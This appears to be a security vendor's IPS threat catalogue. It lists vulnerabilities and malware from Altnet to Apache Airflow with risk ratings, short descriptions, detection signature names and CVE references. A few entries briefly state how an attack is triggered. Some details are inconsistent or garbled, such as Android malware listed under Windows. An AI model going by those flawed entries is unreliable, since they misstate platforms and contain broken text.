Platform: Windows
Software: Altnet Peer Points Manager
Type: Misconfiguration
Description: Altnet Peer Points Manager is a peer to peer program usually received along with another installation such as Kazaa. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Altnet-Peer-Points-Manager
Back to top

Altnet-Topsearch

About this vulnerability: Altnet TopSearch
Risk: Low
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Altnet TopSearch
Type: Misconfiguration
Description: Altnet TopSearch is a peer to peer program. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Altnet-Topsearch
Back to top

Alueron

About this vulnerability: Alueron
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Alueron is a Trojan that tries to steal user credentials, passwords and credit card information from the infected machine.
Situation: HTTP_CSU-Alueron-Activity
Back to top

Amcrest-Dahua-NVR-Camera-Denial-Of-Service

About this vulnerability: An attempt to exploit a vulnerability in Amcrest Dahua NVR Camera detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Amcrest Dahua NVR Camera detected.
Situation: Generic_CS-Amcrest-Dahua-NVR-Camera-Denial-Of-Service
References:
CVE-2020-5735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5735
Back to top

Amlib-NetOPAC-Stack-Remote-Buffer-Overflow

About this vulnerability: An Amlib NetOPAC Stack Remote Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Amlib NetOPAC
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Amlib NetOPAC, version 5.2.0.4, in in the e, which allows remote attackers to execute arbitrary code thought a long app parameter.
Situation: HTTP_CSU-Amlib-NetOPAC-Stack-Remote-Buffer-Overflow
References:
BID-42293
http://www.securityfocus.com/bid/42293
Back to top

AmmSoft-ScriptFTP-Buffer-Overflow

About this vulnerability: An AmmSoft ScriptFTP Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AmmSoft ScriptFTP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in AmmSoft ScriptFTP 3.3 which allows remote attackers to execute arbitrary code via a long GETLIST or GETFILE command in a ScriptFTP script.
Situation: Generic_CS-AmmSoft-ScriptFTP-Buffer-Overflow
References:
CVE-2011-3976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3976
BID-49707
http://www.securityfocus.com/bid/49707
OSVDB-75633
http://www.osvdb.org/75633
Back to top

AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in AMX NetLinx VNC ActiveX control
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AMX NetLinx
Type: Buffer Overflow
Description: There is a vulnerability in AMX NetLinx VNC ActiveX control. The vulnerability is due to insufficient validating of user supplied parameters.
Situation: HTTP_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
File-Text_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-3536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3536
BID-24703
http://www.securityfocus.com/bid/24703
OSVDB-37672
http://www.osvdb.org/37672
Back to top

Analogx-SimpleServer-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in AnalogX SimpleServer:WWW
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 98; Windows ME
Software: AnalogX SimpleServer:WWW
Type: Malfunction
Description: AnalogX SimpleServer:WWW HTTP server is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request appended with "aux" to the server to cause the server to crash. The server must be restarted in order to regain normal functionality.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2001-0386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0386
BID-2608
http://www.securityfocus.com/bid/2608
OSVDB-3781
http://www.osvdb.org/3781
Back to top

Android-Content-Provider-File-Disclosure

About this vulnerability: An Android Content Provider File Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-716-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: Google Android Browser
Type: Input Validation
Description: A vulnerability in Google Android Browser, versions before 2.3.4, which allows remote attackers to obtain SD card contents via a crafted URL and JavaScript redirect.
Situation: File-Text_Android-Content-Provider-File-Disclosure
References:
CVE-2010-4804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4804
Back to top

Android-Gingermaster

About this vulnerability: Android GingerMaster
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Code Injection
Description: GingerMaster is an Android malware that can be remote controlled.
Situation: HTTP_CS-Android-Gingermaster.A-3-Traffic
HTTP_CRL-Android-Gingermaster-Traffic
Back to top

Android-Spyeye-Trojan

About this vulnerability: Android SpyEye trojan
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Code Injection
Description: SpyEye is a trojan for Android mobile platform.
Situation: HTTP_CSU-Android-Spyeye-Trojan-Traffic
Back to top

Android-Stiniter.a

About this vulnerability: Android Stiniter.A
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Stiniter.A is a virus for Android. It exploits a vulnerability to gain root privilege, posts sensitive information to Internet and sends SMS messages.
Situation: HTTP_CSU-Android-Stiniter.a-Traffic
Back to top

Android.Backdoor.Acnetsteal-Botnet

About this vulnerability: Android.Backdoor.Acnetsteal botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Backdoor.Acnetsteal is a malware that targets Android hosts.
Situation: HTTP_CSH-Acnetsteal-Traffic
Back to top

Android.Backdoor.Obad.a-Botnet

About this vulnerability: Android.Backdoor.Obad.a botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Backdoor.Obad.a is a malware that targets Android hosts. The malware can be used to steal the user's personal information and download additional malicious files on the affected machine.
Situation: HTTP_CRL-Obad-Traffic
HTTP_CRL-Obad.a-Traffic
Back to top

Android.Spyware.Ksapp.A-Botnet

About this vulnerability: Android.Spyware.Ksapp.A botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Spyware.Ksapp.A is a malware that targets Android hosts. The malware can be used to prevent gather sensitive information on the affected appliance.
Situation: HTTP_CRL-Ksapp.A-Traffic
Back to top

Android.Spyware.Mobilespy.a-Botnet

About this vulnerability: Android.Spyware.Mobilespy.a botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Spyware.Mobilespy.a is a malware that targets Android hosts.
Situation: HTTP_CRL-Mobilespy.a-Traffic
Back to top

Android.Spyware.TheftSpy-Botnet

About this vulnerability: Android.Spyware.TheftSpy botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Spyware.TheftSpy is a spyware that targets Windows hosts.
Situation: HTTP_CRL-TheftSpy.C-Traffic
Back to top

Android.Trojan.FakeInst.BL-Botnet

About this vulnerability: Android.Trojan.FakeInst.BL botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Trojan.FakeInst.BL is a malware that targets Andoird hosts. It is used to send expensive SMS messages.
Situation: HTTP_CRL-FakeInst.BL-Traffic
Back to top

Android.Trojan.FakeLookout-Botnet

About this vulnerability: Android.Trojan.FakeLookout botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Trojan.FakeLookout is a malware that targets Android hosts. It opens a backdoor and steals information from the affected machine.
Situation: HTTP_CSH-FakeLookout-Traffic
Back to top

Android.Trojan.SMSreg-Botnet

About this vulnerability: Android.Trojan.SMSreg botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Trojan.SMSreg is a malware that targets Andoird hosts.
Situation: HTTP_CRL-SMSreg-Traffic
Back to top

Android.Trojan.Stealer-Botnet

About this vulnerability: Android.Trojan.Stealer botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1720-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Trojan.Stealer is a malware that targets Android hosts. It is used to send expensive SMS messages.
Situation: HTTP_CRL-Stealer.a-Traffic
Back to top

Android.Trojan.Uranico-Botnet

About this vulnerability: Android.Trojan.Uranico.A botnet
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Android.Trojan.Uranico.A is a malware that targets Android hosts. It is used to steal data from the affected machine.
Situation: HTTP_CRL_Uranico.A-Traffic
Back to top

Android/Bgserv-Malware

About this vulnerability: Android/Bgserv malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Code Injection
Description: Android/Bgserv is a trojan for Android planform.
Situation: HTTP_CSH-Android/Bgserv-Traffic
Back to top

Ani-Windows-Animated-Cursor-Code-Execution

About this vulnerability: Incorrect length field buffer overflow
Risk: High
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows 2003; Windows XP SP2; Windows Vista
Software: <os>
Type: Buffer Overflow
Description: Microsoft Windows incorrectly parses the AnimationHeader information in ANI files. The length of the header should be 36 bytes, but the value is not checked properly. This allows specially-crafted ANI files to cause a buffer overflow, leading to arbitrary code execution. Animated cursors can be supplied by web pages, which allows malicious web sites to compromise systems when they are viewed with Internet Explorer. Also, viewing folders that contain malicious ANI files causes a buffer overflow in Windows Explorer.
Situation: HTTP_Ani-Windows-Animationheader-Length-Buffer-Overflow
E-Mail_BS-Ani-Windows-Animationheader-Length-Buffer-Overflow
File-RIFF_Ani-Windows-Animationheader-Length-Buffer-Overflow
References:
CVE-2007-0038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0038
BID-23194
http://www.securityfocus.com/bid/23194
OSVDB-33629
http://www.osvdb.org/33629
MS07-017
http://technet.microsoft.com/security/bulletin/MS07-017
Back to top

Ani-Windows-Animationheader-Length-Buffer-Overflow

About this vulnerability: ANI file incorrect length field buffer overflow
Risk: High
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows ME; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003; Windows XP SP0; Windows XP SP1
Software: <os>
Type: Buffer Overflow
Description: Microsoft Windows Explorer and Internet Explorer parses incorrectly the AnimationHeader information in ANI files. The length of the header should be 36 bytes, but the value is not checked properly. This allows specially-crafted ANI files to cause a buffer overflow, leading to arbitrary code execution. Animated cursors can be supplied by web pages, which allows malicious web sites to compromise systems when they are viewed with IE. Also, viewing folders that contain malicious ANI files causes a buffer overflow in Windows Explorer.
Situation: HTTP_Ani-Windows-Animationheader-Length-Buffer-Overflow
SMB-TCP_FR-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload
SMB-TCP_FW-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload
File-RIFF_Ani-Windows-Animationheader-Length-Buffer-Overflow
References:
CVE-2004-1049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1049
BID-12233
http://www.securityfocus.com/bid/12233
OSVDB-12623
http://www.osvdb.org/12623
MS05-002
http://technet.microsoft.com/security/bulletin/MS05-002
Back to top

Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service

About this vulnerability: ANI file zero frame number or rate number causes Windows to crash
Risk: Moderate
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003; Windows XP SP0; Windows XP SP1
Software: <os>
Type: Malfunction
Description: Microsoft Windows fails to properly check the frame number and the rate number while parsing ANI files. By setting either of these values to zero in an ANI file, and tricking a victim to view the file in Windows Explorer or Internet Explorer, remote attackers can cause the victim's Windows operating system to freeze.
Situation: HTTP_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
SMB-TCP_FR-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Download
SMB-TCP_FW-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Upload
File-RIFF_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
References:
CVE-2004-0315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0315
BID-12094
http://www.securityfocus.com/bid/12094
Back to top

ANT-Studio-Web-Server-Denial-Of-Service

About this vulnerability: A vulnerability in ANT Studio web server allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ANT Studio
Type: Malfunction
Description: A vulnerability in ANT Studio web server allowing an attacker can send custom TCP packets causing a denial of service condition.
Situation: Generic_CS-ANT-Studio-Web-Server-Denial-Of-Service
Back to top

Anviz-CrossChex-Buffer-Overflow

About this vulnerability: A vulnerability in Anviz CrossChex
Risk: High
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Anviz CrossChex
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Anviz CrossChex which allows remote attackers to execute arbitrary code by waiting for broadcasts from Ainz CrossChex looking for new devices and returning a malicious broadcast.
Situation: Generic_UDP-Anviz-CrossChex-Buffer-Overflow
References:
CVE-2019-12518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12518
Back to top

AnyDesk-GUI-Format-String-Write

About this vulnerability: A vulnerability in AnyDesk
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Linux
Software: AnyDesk
Type: Input Validation
Description: A vulnerability in AnyDesk, version 5.5.2, which allows remote attackers to execute arbitrary code using a format string write by sending a specially crafted discovery packet.
Situation: Generic_UDP-AnyDesk-GUI-Format-String-Write
References:
CVE-2020-13160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13160
Back to top

AOL-Desktop-Rtx-File-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in AOL Desktop
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AOL
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in AOL Desktop software. The vulnerability is due to a boundary error while parsing a specially crafted .RTX file. Remote attackers could exploit this vulnerability by enticing target users to open the crafted file with a vulnerable version of the AOL Desktop. Successful exploitation would result in arbitrary code injection and execution with the privileges of the logged in user. If code execution is not successful, the application may terminate abnormally.
Situation: File-Text_Long-Domain-Name-In-HREF
References:
BID-46129
http://www.securityfocus.com/bid/46129
Back to top

AOL-Explorer-ActiveX-Vulnerable-Function-Call

About this vulnerability: Vulnerable function call against AOL Explorer
Risk: Low
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Insecure Configuration
Description: A vulnerability exists in the AOL branded Internet Explorer when calling certain ActiveX functions.
Situation: File-Text_AOL-Explorer-ActiveX-Vulnerable-Function-Call
Back to top

AOL-Instant-Messenger-Away-Message-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in AOL Instant Messenger
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1341-5242
Platform: Windows
Software: AOL Instant Messenger
Type: Malfunction
Description: There is a buffer overflow vulnerability in AOL Instant Messenger. The vulnerability allows arbitary code execution in the context of the current user.
Situation: HTTP_SS-AOL-Instant-Messenger-Away-Message-Buffer-Overflow
References:
CVE-2004-0636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0636
BID-10889
http://www.securityfocus.com/bid/10889
Back to top

AOL-Instant-Messenger-Usage

About this vulnerability: AOL Instant Messenger usage
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AOL Instant Messenger
Type: Peer-to-Peer
Description: AOL Instant Messenger is a peer-to-peer network client that can be used to send messages and share files among users.
Situation: HTTP_CS-AOL-Instant-Messenger-Usage
IM-TCP_AOL-SignOn
IM-TCP_Aim-SignOn-Reply
Back to top

AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow

About this vulnerability: A vulnerability in AOL Phobos Playlist ActiveX control
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AOL
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Phobox.Playlist ActiveX control distributed by American Online (AOL). The ActiveX control fails to sanitize user supplied input leading to a buffer overflow condition. A successful exploitation may lead to code execution in the context of the current user.
Situation: HTTP_SS-AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
File-Text_AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
References:
OSVDB-61964
http://www.osvdb.org/61964
Back to top

AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in AOL Radio ActiveX control
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1400-5242
Platform: Windows
Software: AOL Radio
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in AOL Radio. These vulnerabilities are due to boundary errors in the AOL Radio AmpX ActiveX Control. A remote attacker can exploit these vulnerabilities by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-5755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5755
BID-26396
http://www.securityfocus.com/bid/26396
OSVDB-38705
http://www.osvdb.org/38705
Back to top

AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability: A vulnerability in AOL Radio AmpX ActiveX Control
Risk: High
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-1583-5242
Platform: Windows
Software: AOL Radio
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in AOL Radio AmpX ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of a ControlFile() method. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow
References:
BID-35028
http://www.securityfocus.com/bid/35028
OSVDB-54706
http://www.osvdb.org/54706
Back to top

AOL-SuperBuddy-ActiveX-Control-Function-Deference

About this vulnerability: A vulnerability in AOL SuperBuddy ActiveX control
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AOL
Type: Input Validation
Description: There is a function deference vulnerability in SuperBuddy ActiveX control distributed in American Online (AOL) client software. The vulnerability is caused by an insufficient input validation when user controlled input is processed by the ActiveX control. Successful exploitation leads arbitrary code execution in the context of the current user.
Situation: HTTP_SS-AOL-SuperBuddy-ActiveX-Control-Function-Deference
File-Text_AOL-SuperBuddy-ActiveX-Control-Function-Deference
References:
CVE-2006-5820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820
BID-23224
http://www.securityfocus.com/bid/23224
OSVDB-34318
http://www.osvdb.org/34318
Back to top

Apache-1.3-Mod_Proxy-Buffer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A vulnerability exists in the mod_proxy module of Apache 1.3, which can be used as a web proxy, reverse proxy, and/or cache. This module contains a heap-based buffer overflow that occurs while retrieving an HTTP response from a malicious server on behalf of a client. An attacker may use this vulnerability to trigger a denial of service on the vulnerable Apache server. There is also the possibility of remote code execution on some older operating system platforms. On most platforms, upon reception of a specially crafted response, the child process acting as a proxy for a client will terminate, closing any open TCP connections. As neither the parent Apache process nor any other child processes are affected, the denial of service condition only affects connections being handled by the process being attacked (possible only the attacking client). Other connections to the Apache server will be unaffected. On some older OpenBSD and FreeBSD distributions, the vulnerability can be exploited to execute code, due to the particulars of their implementation of the memcpy() function. In such cases, the behaviour of the compromised server depends on the nature of the exploit code.
Situation: HTTP_SHS-Apache-1.3-Mod_Proxy-Buffer-Overflow
References:
CVE-2004-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492
BID-10508
http://www.securityfocus.com/bid/10508
Back to top

Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: There is a vulnerability in the Apache HTTP server SSL module, mod_ssl. This module, which is responsible for managing encrypted communications, can be forced into an infinite loop by the unexpected termination of connection. This vulnerability may be exploited by an attacker to cause a denial of service condition. If the vulnerability is triggered a single time, a single child process will enter an infinite loop and be unable to service current or new connections. The Apache server children will continue to operate, though at reduced efficiency. If the vulnerability is triggered multiple times, the target system can become unresponsive due to CPU resource exhaustion. If the vulnerability is triggered once per Apache server child, a complete denial of service will occur.
Situation: HTTPS_CS-Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service
References:
CVE-2004-0748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0748
BID-11094
http://www.securityfocus.com/bid/11094
Back to top

Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678

About this vulnerability: An attempt to exploit a vulnerability in Apache ActiveMQ detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Input Validation
Description: CVE-2022-41678 is an authenticated, arbitrary code execution vulnerability in the Jolokia component of Apache ActiveMQ prior to 5.16.6 and 5.17.0.
Situation: HTTP_CRL-Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678
References:
CVE-2022-41678
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41678
Back to top

Apache-Activemq-File-Disclosure

About this vulnerability: An Apache ActiveMQ File Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Input Validation
Description: A vulnerability in Apache Active MQ, versions 5.x before 5.3.2 and 5.4.x before 5.4.0, which allows remote attackers to read source code via a double slash // at the start in a URI to admin/index.jsp, admin/queues.jsp, and admin/topics.jsp.
Situation: HTTP_CSU-Apache-Activemq-File-Disclosure
References:
CVE-2010-1587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1587
BID-39636
http://www.securityfocus.com/bid/39636
OSVDB-64020
http://www.osvdb.org/64020
Back to top

Apache-Activemq-File-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation ActiveMQ
Risk: Moderate
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Apache ActiveMQ. The vulnerability is due to a flaw in the file server upload/download functionality used for blob messages. A remote, unauthenticated attacker may exploit this vulnerability by uploading a specially crafted file to the server. Successful exploitation could lead to execution of arbitrary code.
Situation: HTTP_CSH-Apache-Activemq-File-Upload-Directorytraversal
References:
CVE-2015-1830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1830
Back to top

Apache-Activemq-Fileserver-File-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation ActiveMQ
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Apache ActiveMQ. A remote attacker could use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Apache-Activemq-Fileserver-File-Upload-Directory-Traversal
References:
CVE-2016-3088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088
Back to top

Apache-Activemq-Fileserver-Move-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation ActiveMQ
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the fileserver web application in Apache ActiveMQ. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CSH-Apache-Activemq-Fileserver-Move-Directory-Traversal
References:
CVE-2016-3088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088
Back to top

Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache ActiveMQ
Risk: Moderate
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Malfunction
Description: Insufficient validation of JMX requests causes a vulnerability in Apache ActiveMQ. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution
References:
CVE-2020-11998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11998
Back to top

Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604

About this vulnerability: An attempt to exploit a vulnerability in Apache ActiveMQ detected
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Input Validation
Description: Apache ActiveMQ is vulnerable to remote code execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
Situation: Generic_CS-Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604
References:
CVE-2023-46604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46604
Back to top

Apache-Activemq-Shutdown-Command-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation ActiveMQ
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Malfunction
Description: A denial of service vulnerability exists in Apache ActiveMQ. The vulnerability is due to missing authentication for the undocumented shutdown command. A remote, unauthenticated attacker may exploit this vulnerability by sending crafted packets to the server. Successful exploitation could lead to a denial of service condition.
Situation: Generic_CS-Apache-Activemq-Shutdown-Command-Denial-Of-Service
References:
CVE-2014-3576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3576
Back to top

Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation ActiveMQ
Risk: Moderate
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Apache ActiveMQ. The vulnerability is due to insufficient validation of the JMSDestination parameter to message.jsp in the web console. A remote attacker could exploit this vulnerability by enticing a target user to open a malicious crafted link or web page. Successful exploitation could lead to arbitrary script execution in the target user's browser under the security context of the user.
Situation: HTTP_CRL-Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting
References:
CVE-2020-13947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13947
Back to top

Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation ActiveMQ
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache ActiveMQ
Type: Cross-site Scripting
Description: There has been reported a cross-site scripting vulnerability in Apache ActiveMQ. Exploiting this vulnerability requires the target user to open maliciously crafted link. Successful exploitation can lead to arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting
References:
CVE-2018-8006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8006
Back to top

Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981

About this vulnerability: An attempt to exploit a vulnerability in Apache Airflow detected
Risk: High
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: Apache Airflow
Type: Input Validation
